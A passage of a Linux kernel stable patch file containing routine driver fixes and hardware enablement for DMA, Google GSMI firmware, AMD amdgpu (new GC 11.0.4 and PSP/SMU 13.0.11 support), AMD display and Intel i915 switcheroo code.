++	ret = ldma_parse_dt(d);
++	if (ret)
++		return ret;
++
+ 	dma_dev->device_alloc_chan_resources = ldma_alloc_chan_resources;
+ 	dma_dev->device_free_chan_resources = ldma_free_chan_resources;
+ 	dma_dev->device_terminate_all = ldma_terminate_all;
+diff --git a/drivers/dma/tegra210-adma.c b/drivers/dma/tegra210-adma.c
+index ae39b52012b2f..79da93cc77b64 100644
+--- a/drivers/dma/tegra210-adma.c
++++ b/drivers/dma/tegra210-adma.c
+@@ -221,7 +221,7 @@ static int tegra_adma_init(struct tegra_adma *tdma)
+ 	int ret;
+ 
+ 	/* Clear any interrupts */
+-	tdma_write(tdma, tdma->cdata->global_int_clear, 0x1);
++	tdma_write(tdma, tdma->cdata->ch_base_offset + tdma->cdata->global_int_clear, 0x1);
+ 
+ 	/* Assert soft reset */
+ 	tdma_write(tdma, ADMA_GLOBAL_SOFT_RESET, 0x1);
+diff --git a/drivers/firmware/google/gsmi.c b/drivers/firmware/google/gsmi.c
+index 4e2575dfeb908..871bedf533a80 100644
+--- a/drivers/firmware/google/gsmi.c
++++ b/drivers/firmware/google/gsmi.c
+@@ -361,9 +361,10 @@ static efi_status_t gsmi_get_variable(efi_char16_t *name,
+ 		memcpy(data, gsmi_dev.data_buf->start, *data_size);
+ 
+ 		/* All variables are have the following attributes */
+-		*attr = EFI_VARIABLE_NON_VOLATILE |
+-			EFI_VARIABLE_BOOTSERVICE_ACCESS |
+-			EFI_VARIABLE_RUNTIME_ACCESS;
++		if (attr)
++			*attr = EFI_VARIABLE_NON_VOLATILE |
++				EFI_VARIABLE_BOOTSERVICE_ACCESS |
++				EFI_VARIABLE_RUNTIME_ACCESS;
+ 	}
+ 
+ 	spin_unlock_irqrestore(&gsmi_dev.lock, flags);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_discovery.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_discovery.c
+index 3993e61349141..d8441e273cb5d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_discovery.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_discovery.c
+@@ -1507,6 +1507,7 @@ static int amdgpu_discovery_set_common_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 		amdgpu_device_ip_block_add(adev, &soc21_common_ip_block);
+ 		break;
+ 	default:
+@@ -1551,6 +1552,7 @@ static int amdgpu_discovery_set_gmc_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 		amdgpu_device_ip_block_add(adev, &gmc_v11_0_ip_block);
+ 		break;
+ 	default:
+@@ -1636,6 +1638,7 @@ static int amdgpu_discovery_set_psp_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(13, 0, 7):
+ 	case IP_VERSION(13, 0, 8):
+ 	case IP_VERSION(13, 0, 10):
++	case IP_VERSION(13, 0, 11):
+ 		amdgpu_device_ip_block_add(adev, &psp_v13_0_ip_block);
+ 		break;
+ 	case IP_VERSION(13, 0, 4):
+@@ -1686,6 +1689,7 @@ static int amdgpu_discovery_set_smu_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(13, 0, 7):
+ 	case IP_VERSION(13, 0, 8):
+ 	case IP_VERSION(13, 0, 10):
++	case IP_VERSION(13, 0, 11):
+ 		amdgpu_device_ip_block_add(adev, &smu_v13_0_ip_block);
+ 		break;
+ 	default:
+@@ -1785,6 +1789,7 @@ static int amdgpu_discovery_set_gc_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 		amdgpu_device_ip_block_add(adev, &gfx_v11_0_ip_block);
+ 		break;
+ 	default:
+@@ -1948,6 +1953,7 @@ static int amdgpu_discovery_set_mes_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 		amdgpu_device_ip_block_add(adev, &mes_v11_0_ip_block);
+ 		adev->enable_mes = true;
+ 		adev->enable_mes_kiq = true;
+@@ -2177,6 +2183,7 @@ int amdgpu_discovery_set_ip_blocks(struct amdgpu_device *adev)
+ 		adev->family = AMDGPU_FAMILY_GC_11_0_0;
+ 		break;
+ 	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
+ 		adev->family = AMDGPU_FAMILY_GC_11_0_1;
+ 		break;
+ 	default:
+@@ -2194,6 +2201,7 @@ int amdgpu_discovery_set_ip_blocks(struct amdgpu_device *adev)
+ 	case IP_VERSION(10, 3, 6):
+ 	case IP_VERSION(10, 3, 7):
+ 	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
+ 		adev->flags |= AMD_IS_APU;
+ 		break;
+ 	default:
+@@ -2250,6 +2258,7 @@ int amdgpu_discovery_set_ip_blocks(struct amdgpu_device *adev)
+ 		adev->nbio.hdp_flush_reg = &nbio_v4_3_hdp_flush_reg;
+ 		break;
+ 	case IP_VERSION(7, 7, 0):
++	case IP_VERSION(7, 7, 1):
+ 		adev->nbio.funcs = &nbio_v7_7_funcs;
+ 		adev->nbio.hdp_flush_reg = &nbio_v7_7_hdp_flush_reg;
+ 		break;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+index 9546adc8a76f6..99f5e38c4835e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -156,6 +156,9 @@ static bool amdgpu_gfx_is_compute_multipipe_capable(struct amdgpu_device *adev)
+ 		return amdgpu_compute_multipipe == 1;
+ 	}
+ 
++	if (adev->ip_versions[GC_HWIP][0] > IP_VERSION(9, 0, 0))
++		return true;
++
+ 	/* FIXME: spreading the queues across pipes causes perf regressions
+ 	 * on POLARIS11 compute workloads */
+ 	if (adev->asic_type == CHIP_POLARIS11)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+index 28612e56d0d45..02a4c93673ce2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+@@ -548,6 +548,8 @@ void amdgpu_gmc_tmz_set(struct amdgpu_device *adev)
+ 	case IP_VERSION(10, 3, 1):
+ 	/* YELLOW_CARP*/
+ 	case IP_VERSION(10, 3, 3):
++	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
+ 		/* Don't enable it by default yet.
+ 		 */
+ 		if (amdgpu_tmz < 1) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c
+index adac650cf544a..3bf0e893c07df 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_job.c
+@@ -154,8 +154,14 @@ void amdgpu_job_free_resources(struct amdgpu_job *job)
+ 	struct dma_fence *f;
+ 	unsigned i;
+ 
+-	/* use sched fence if available */
+-	f = job->base.s_fence ? &job->base.s_fence->finished :  &job->hw_fence;
++	/* Check if any fences where initialized */
++	if (job->base.s_fence && job->base.s_fence->finished.ops)
++		f = &job->base.s_fence->finished;
++	else if (job->hw_fence.ops)
++		f = &job->hw_fence;
++	else
++		f = NULL;
++
+ 	for (i = 0; i < job->num_ibs; ++i)
+ 		amdgpu_ib_free(ring->adev, &job->ibs[i], f);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 7978307e1d6d2..712dd72f3ccf2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -139,6 +139,7 @@ static int psp_early_init(void *handle)
+ 	case IP_VERSION(13, 0, 5):
+ 	case IP_VERSION(13, 0, 8):
+ 	case IP_VERSION(13, 0, 10):
++	case IP_VERSION(13, 0, 11):
+ 		psp_v13_0_set_psp_funcs(psp);
+ 		psp->autoload_supported = true;
+ 		break;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 0fecc5bf45bc5..3bf4f2edc1089 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -77,6 +77,10 @@ MODULE_FIRMWARE("amdgpu/gc_11_0_3_pfp.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_3_me.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_3_mec.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_3_rlc.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_pfp.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_me.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_mec.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_rlc.bin");
+ 
+ static const struct soc15_reg_golden golden_settings_gc_11_0_1[] =
+ {
+@@ -262,6 +266,7 @@ static void gfx_v11_0_init_golden_registers(struct amdgpu_device *adev)
+ {
+ 	switch (adev->ip_versions[GC_HWIP][0]) {
+ 	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
+ 		soc15_program_register_sequence(adev,
+ 						golden_settings_gc_11_0_1,
+ 						(const u32)ARRAY_SIZE(golden_settings_gc_11_0_1));
+@@ -856,6 +861,7 @@ static int gfx_v11_0_gpu_early_init(struct amdgpu_device *adev)
+ 		adev->gfx.config.sc_earlyz_tile_fifo_size = 0x4C0;
+ 		break;
+ 	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
+ 		adev->gfx.config.max_hw_contexts = 8;
+ 		adev->gfx.config.sc_prim_fifo_size_frontend = 0x20;
+ 		adev->gfx.config.sc_prim_fifo_size_backend = 0x100;
+@@ -1282,7 +1288,6 @@ static int gfx_v11_0_sw_init(void *handle)
+ 
+ 	switch (adev->ip_versions[GC_HWIP][0]) {
+ 	case IP_VERSION(11, 0, 0):
+-	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
+ 		adev->gfx.me.num_me = 1;
+@@ -1292,6 +1297,15 @@ static int gfx_v11_0_sw_init(void *handle)
+ 		adev->gfx.mec.num_pipe_per_mec = 4;
+ 		adev->gfx.mec.num_queue_per_pipe = 4;
+ 		break;
++	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
++		adev->gfx.me.num_me = 1;
++		adev->gfx.me.num_pipe_per_me = 1;
++		adev->gfx.me.num_queue_per_pipe = 1;
++		adev->gfx.mec.num_mec = 1;
++		adev->gfx.mec.num_pipe_per_mec = 4;
++		adev->gfx.mec.num_queue_per_pipe = 4;
++		break;
+ 	default:
+ 		adev->gfx.me.num_me = 1;
+ 		adev->gfx.me.num_pipe_per_me = 1;
+@@ -2486,7 +2500,8 @@ static int gfx_v11_0_wait_for_rlc_autoload_complete(struct amdgpu_device *adev)
+ 	for (i = 0; i < adev->usec_timeout; i++) {
+ 		cp_status = RREG32_SOC15(GC, 0, regCP_STAT);
+ 
+-		if (adev->ip_versions[GC_HWIP][0] == IP_VERSION(11, 0, 1))
++		if (adev->ip_versions[GC_HWIP][0] == IP_VERSION(11, 0, 1) ||
++				adev->ip_versions[GC_HWIP][0] == IP_VERSION(11, 0, 4))
+ 			bootload_status = RREG32_SOC15(GC, 0,
+ 					regRLC_RLCS_BOOTLOAD_STATUS_gc_11_0_1);
+ 		else
+@@ -5022,6 +5037,7 @@ static void gfx_v11_cntl_power_gating(struct amdgpu_device *adev, bool enable)
+ 	if (enable && (adev->pg_flags & AMD_PG_SUPPORT_GFX_PG)) {
+ 		switch (adev->ip_versions[GC_HWIP][0]) {
+ 		case IP_VERSION(11, 0, 1):
++		case IP_VERSION(11, 0, 4):
+ 			WREG32_SOC15(GC, 0, regRLC_PG_DELAY_3, RLC_PG_DELAY_3_DEFAULT_GC_11_0_1);
+ 			break;
+ 		default:
+@@ -5055,6 +5071,7 @@ static int gfx_v11_0_set_powergating_state(void *handle,
+ 		amdgpu_gfx_off_ctrl(adev, enable);
+ 		break;
+ 	case IP_VERSION(11, 0, 1):
++	case IP_VERSION(11, 0, 4):
+ 		gfx_v11_cntl_pg(adev, enable);
+ 		amdgpu_gfx_off_ctrl(adev, enable);
+ 		break;
+@@ -5078,6 +5095,7 @@ static int gfx_v11_0_set_clockgating_state(void *handle,
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 	        gfx_v11_0_update_gfx_clock_gating(adev,
+ 	                        state ==  AMD_CG_STATE_GATE);
+ 	        break;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+index 66dfb574cc7d1..96e0bb5bee78e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+@@ -749,6 +749,7 @@ static int gmc_v11_0_sw_init(void *handle)
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 		adev->num_vmhubs = 2;
+ 		/*
+ 		 * To fulfill 4-level page support,
+diff --git a/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c b/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c
+index 88f9b327183ab..8c5fa4b7b68a2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/psp_v13_0.c
+@@ -46,6 +46,8 @@ MODULE_FIRMWARE("amdgpu/psp_13_0_7_sos.bin");
+ MODULE_FIRMWARE("amdgpu/psp_13_0_7_ta.bin");
+ MODULE_FIRMWARE("amdgpu/psp_13_0_10_sos.bin");
+ MODULE_FIRMWARE("amdgpu/psp_13_0_10_ta.bin");
++MODULE_FIRMWARE("amdgpu/psp_13_0_11_toc.bin");
++MODULE_FIRMWARE("amdgpu/psp_13_0_11_ta.bin");
+ 
+ /* For large FW files the time to complete can be very long */
+ #define USBC_PD_POLLING_LIMIT_S 240
+@@ -102,6 +104,7 @@ static int psp_v13_0_init_microcode(struct psp_context *psp)
+ 	case IP_VERSION(13, 0, 3):
+ 	case IP_VERSION(13, 0, 5):
+ 	case IP_VERSION(13, 0, 8):
++	case IP_VERSION(13, 0, 11):
+ 		err = psp_init_toc_microcode(psp, chip_name);
+ 		if (err)
+ 			return err;
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 909cf9f220c19..9bc9852b9cda9 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -325,6 +325,7 @@ soc21_asic_reset_method(struct amdgpu_device *adev)
+ 	case IP_VERSION(13, 0, 10):
+ 		return AMD_RESET_METHOD_MODE1;
+ 	case IP_VERSION(13, 0, 4):
++	case IP_VERSION(13, 0, 11):
+ 		return AMD_RESET_METHOD_MODE2;
+ 	default:
+ 		if (amdgpu_dpm_is_baco_supported(adev))
+@@ -654,7 +655,23 @@ static int soc21_common_early_init(void *handle)
+ 		adev->external_rev_id = adev->rev_id + 0x20;
+ 		break;
+ 	case IP_VERSION(11, 0, 4):
+-		adev->cg_flags = AMD_CG_SUPPORT_VCN_MGCG |
++		adev->cg_flags =
++			AMD_CG_SUPPORT_GFX_CGCG |
++			AMD_CG_SUPPORT_GFX_CGLS |
++			AMD_CG_SUPPORT_GFX_MGCG |
++			AMD_CG_SUPPORT_GFX_FGCG |
++			AMD_CG_SUPPORT_REPEATER_FGCG |
++			AMD_CG_SUPPORT_GFX_PERF_CLK |
++			AMD_CG_SUPPORT_MC_MGCG |
++			AMD_CG_SUPPORT_MC_LS |
++			AMD_CG_SUPPORT_HDP_MGCG |
++			AMD_CG_SUPPORT_HDP_LS |
++			AMD_CG_SUPPORT_ATHUB_MGCG |
++			AMD_CG_SUPPORT_ATHUB_LS |
++			AMD_CG_SUPPORT_IH_CG |
++			AMD_CG_SUPPORT_BIF_MGCG |
++			AMD_CG_SUPPORT_BIF_LS |
++			AMD_CG_SUPPORT_VCN_MGCG |
+ 			AMD_CG_SUPPORT_JPEG_MGCG;
+ 		adev->pg_flags = AMD_PG_SUPPORT_VCN |
+ 			AMD_PG_SUPPORT_VCN_DPG |
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index dacad8b85963c..e10f1f15c9c43 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1512,8 +1512,6 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 		case IP_VERSION(3, 0, 1):
+ 		case IP_VERSION(3, 1, 2):
+ 		case IP_VERSION(3, 1, 3):
+-		case IP_VERSION(3, 1, 4):
+-		case IP_VERSION(3, 1, 5):
+ 		case IP_VERSION(3, 1, 6):
+ 			init_data.flags.gpu_vm_support = true;
+ 			break;
+@@ -5283,8 +5281,6 @@ static void fill_stream_properties_from_drm_display_mode(
+ 
+ 	timing_out->aspect_ratio = get_aspect_ratio(mode_in);
+ 
+-	stream->output_color_space = get_output_color_space(timing_out);
+-
+ 	stream->out_transfer_func->type = TF_TYPE_PREDEFINED;
+ 	stream->out_transfer_func->tf = TRANSFER_FUNCTION_SRGB;
+ 	if (stream->signal == SIGNAL_TYPE_HDMI_TYPE_A) {
+@@ -5295,6 +5291,8 @@ static void fill_stream_properties_from_drm_display_mode(
+ 			adjust_colour_depth_from_display_info(timing_out, info);
+ 		}
+ 	}
++
++	stream->output_color_space = get_output_color_space(timing_out);
+ }
+ 
+ static void fill_audio_info(struct audio_info *audio_info,
+@@ -9433,8 +9431,8 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 			goto fail;
+ 		}
+ 
+-		if (dm_old_con_state->abm_level !=
+-		    dm_new_con_state->abm_level)
++		if (dm_old_con_state->abm_level != dm_new_con_state->abm_level ||
++		    dm_old_con_state->scaling != dm_new_con_state->scaling)
+ 			new_crtc_state->connectors_changed = true;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/core/dc_hw_sequencer.c
+index 7c2e3b8dc26ad..95562efad6515 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_hw_sequencer.c
+@@ -90,8 +90,8 @@ static const struct out_csc_color_matrix_type output_csc_matrix[] = {
+ 		{ 0xE00, 0xF349, 0xFEB7, 0x1000, 0x6CE, 0x16E3,
+ 				0x24F, 0x200, 0xFCCB, 0xF535, 0xE00, 0x1000} },
+ 	{ COLOR_SPACE_YCBCR2020_TYPE,
+-		{ 0x1000, 0xF149, 0xFEB7, 0x0000, 0x0868, 0x15B2,
+-				0x01E6, 0x0000, 0xFB88, 0xF478, 0x1000, 0x0000} },
++		{ 0x1000, 0xF149, 0xFEB7, 0x1004, 0x0868, 0x15B2,
++				0x01E6, 0x201, 0xFB88, 0xF478, 0x1000, 0x1004} },
+ 	{ COLOR_SPACE_YCBCR709_BLACK_TYPE,
+ 		{ 0x0000, 0x0000, 0x0000, 0x1000, 0x0000, 0x0000,
+ 				0x0000, 0x0200, 0x0000, 0x0000, 0x0000, 0x1000} },
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index b880f4d7d67e6..2875f6bc3a6a2 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -585,6 +585,7 @@ static int smu_set_funcs(struct amdgpu_device *adev)
+ 		yellow_carp_set_ppt_funcs(smu);
+ 		break;
+ 	case IP_VERSION(13, 0, 4):
++	case IP_VERSION(13, 0, 11):
+ 		smu_v13_0_4_set_ppt_funcs(smu);
+ 		break;
+ 	case IP_VERSION(13, 0, 5):
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c
+index 85e22210963fc..5cdc07165480b 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c
+@@ -1171,6 +1171,7 @@ static int renoir_get_smu_metrics_data(struct smu_context *smu,
+ 	int ret = 0;
+ 	uint32_t apu_percent = 0;
+ 	uint32_t dgpu_percent = 0;
++	struct amdgpu_device *adev = smu->adev;
+ 
+ 
+ 	ret = smu_cmn_get_metrics_table(smu,
+@@ -1196,7 +1197,11 @@ static int renoir_get_smu_metrics_data(struct smu_context *smu,
+ 		*value = metrics->AverageUvdActivity / 100;
+ 		break;
+ 	case METRICS_AVERAGE_SOCKETPOWER:
+-		*value = (metrics->CurrentSocketPower << 8) / 1000;
++		if (((adev->ip_versions[MP1_HWIP][0] == IP_VERSION(12, 0, 1)) && (adev->pm.fw_version >= 0x40000f)) ||
++		((adev->ip_versions[MP1_HWIP][0] == IP_VERSION(12, 0, 0)) && (adev->pm.fw_version >= 0x373200)))
++			*value = metrics->CurrentSocketPower << 8;
++		else
++			*value = (metrics->CurrentSocketPower << 8) / 1000;
+ 		break;
+ 	case METRICS_TEMPERATURE_EDGE:
+ 		*value = (metrics->GfxTemperature / 100) *
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 9f9f64c5cdd88..479cbf05c3310 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -250,6 +250,7 @@ int smu_v13_0_check_fw_status(struct smu_context *smu)
+ 
+ 	switch (adev->ip_versions[MP1_HWIP][0]) {
+ 	case IP_VERSION(13, 0, 4):
++	case IP_VERSION(13, 0, 11):
+ 		mp1_fw_flags = RREG32_PCIE(MP1_Public |
+ 					   (smnMP1_V13_0_4_FIRMWARE_FLAGS & 0xffffffff));
+ 		break;
+@@ -303,6 +304,7 @@ int smu_v13_0_check_fw_version(struct smu_context *smu)
+ 		smu->smc_driver_if_version = SMU13_DRIVER_IF_VERSION_YELLOW_CARP;
+ 		break;
+ 	case IP_VERSION(13, 0, 4):
++	case IP_VERSION(13, 0, 11):
+ 		smu->smc_driver_if_version = SMU13_DRIVER_IF_VERSION_SMU_V13_0_4;
+ 		break;
+ 	case IP_VERSION(13, 0, 5):
+@@ -843,6 +845,7 @@ int smu_v13_0_gfx_off_control(struct smu_context *smu, bool enable)
+ 	case IP_VERSION(13, 0, 7):
+ 	case IP_VERSION(13, 0, 8):
+ 	case IP_VERSION(13, 0, 10):
++	case IP_VERSION(13, 0, 11):
+ 		if (!(adev->pm.pp_feature & PP_GFXOFF_MASK))
+ 			return 0;
+ 		if (enable)
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+index 97e1d55dcaad5..8fa9a36c38b64 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+@@ -1026,6 +1026,15 @@ static const struct pptable_funcs smu_v13_0_4_ppt_funcs = {
+ 	.set_gfx_power_up_by_imu = smu_v13_0_set_gfx_power_up_by_imu,
+ };
+ 
++static void smu_v13_0_4_set_smu_mailbox_registers(struct smu_context *smu)
++{
++	struct amdgpu_device *adev = smu->adev;
++
++	smu->param_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_82);
++	smu->msg_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_66);
++	smu->resp_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_90);
++}
++
+ void smu_v13_0_4_set_ppt_funcs(struct smu_context *smu)
+ {
+ 	struct amdgpu_device *adev = smu->adev;
+@@ -1035,7 +1044,9 @@ void smu_v13_0_4_set_ppt_funcs(struct smu_context *smu)
+ 	smu->feature_map = smu_v13_0_4_feature_mask_map;
+ 	smu->table_map = smu_v13_0_4_table_map;
+ 	smu->is_apu = true;
+-	smu->param_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_82);
+-	smu->msg_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_66);
+-	smu->resp_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_90);
++
++	if (adev->ip_versions[MP1_HWIP][0] == IP_VERSION(13, 0, 4))
++		smu_v13_0_4_set_smu_mailbox_registers(smu);
++	else
++		smu_v13_0_set_smu_mailbox_registers(smu);
+ }
+diff --git a/drivers/gpu/drm/i915/display/skl_universal_plane.c b/drivers/gpu/drm/i915/display/skl_universal_plane.c
+index 7cb7130434089..bc523a3d1d42f 100644
+--- a/drivers/gpu/drm/i915/display/skl_universal_plane.c
++++ b/drivers/gpu/drm/i915/display/skl_universal_plane.c
+@@ -1620,7 +1620,7 @@ static int skl_check_main_surface(struct intel_plane_state *plane_state)
+ 	u32 offset;
+ 	int ret;
+ 
+-	if (w > max_width || w < min_width || h > max_height) {
++	if (w > max_width || w < min_width || h > max_height || h < 1) {
+ 		drm_dbg_kms(&dev_priv->drm,
+ 			    "requested Y/RGB source size %dx%d outside limits (min: %dx1 max: %dx%d)\n",
+ 			    w, h, min_width, max_width, max_height);
+diff --git a/drivers/gpu/drm/i915/i915_driver.c b/drivers/gpu/drm/i915/i915_driver.c
+index 2ce30cff461a0..35bc2a3fa811c 100644
+--- a/drivers/gpu/drm/i915/i915_driver.c
++++ b/drivers/gpu/drm/i915/i915_driver.c
+@@ -1070,12 +1070,9 @@ static int i915_driver_open(struct drm_device *dev, struct drm_file *file)
+  */
+ static void i915_driver_lastclose(struct drm_device *dev)
+ {
+-	struct drm_i915_private *i915 = to_i915(dev);
+-
+ 	intel_fbdev_restore_mode(dev);
+ 
+-	if (HAS_DISPLAY(i915))
+-		vga_switcheroo_process_delayed_switch();
++	vga_switcheroo_process_delayed_switch();
+ }
+ 
+ static void i915_driver_postclose(struct drm_device *dev, struct drm_file *file)
+diff --git a/drivers/gpu/drm/i915/i915_pci.c b/drivers/gpu/drm/i915/i915_pci.c
+index cd4487a1d3be0..34f2d9da201e2 100644
+--- a/drivers/gpu/drm/i915/i915_pci.c
++++ b/drivers/gpu/drm/i915/i915_pci.c
+@@ -423,7 +423,8 @@ static const struct intel_device_info ilk_m_info = {
+ 	.has_coherent_ggtt = true, \
+ 	.has_llc = 1, \
+ 	.has_rc6 = 1, \
+-	.has_rc6p = 1, \
++	/* snb does support rc6p, but enabling it causes various issues */ \
++	.has_rc6p = 0, \
+ 	.has_rps = true, \
+ 	.dma_mask_size = 40, \
+ 	.__runtime.ppgtt_type = INTEL_PPGTT_ALIASING, \
+diff --git a/drivers/gpu/drm/i915/i915_switcheroo.c b/drivers/gpu/drm/i915/i915_switcheroo.c
+index 23777d500cdf9..f45bd6b6cede4 100644
+--- a/drivers/gpu/drm/i915/i915_switcheroo.c
++++ b/drivers/gpu/drm/i915/i915_switcheroo.c
+@@ -19,6 +19,10 @@ static void i915_switcheroo_set_state(struct pci_dev *pdev,
+ 		dev_err(&pdev->dev, "DRM not initialized, aborting switch.\n");
+ 		return;
+ 	}
++	if (!HAS_DISPLAY(i915)) {
++		dev_err(&pdev->dev, "Device state not initialized, aborting switch.\n");
++		return;
++	}
+ 
+ 	if (state == VGA_SWITCHEROO_ON) {
+ 		drm_info(&i915->drm, "switched on\n");
+@@ -44,7 +48,7 @@ static bool i915_switcheroo_can_switch(struct pci_dev *pdev)
+ 	 * locking inversion with the driver load path. And the access here is
+ 	 * completely racy anyway. So don't bother with locking for now.
+ 	 */
+-	return i915 && atomic_read(&i915->drm.open_count) == 0;
++	return i915 && HAS_DISPLAY(i915) && atomic_read(&i915->drm.open_count) == 0;
+ }
+ 
+ static const struct vga_switcheroo_client_ops i915_switcheroo_ops = {
+diff --git a/drivers/infiniband/ulp/srp/ib_srp.h b/drivers/infiniband/ulp/srp/ib_srp.h
+index 00b0068fda208..5d94db453df32 100644
+--- a/drivers/infiniband/ulp/srp/ib_srp.h
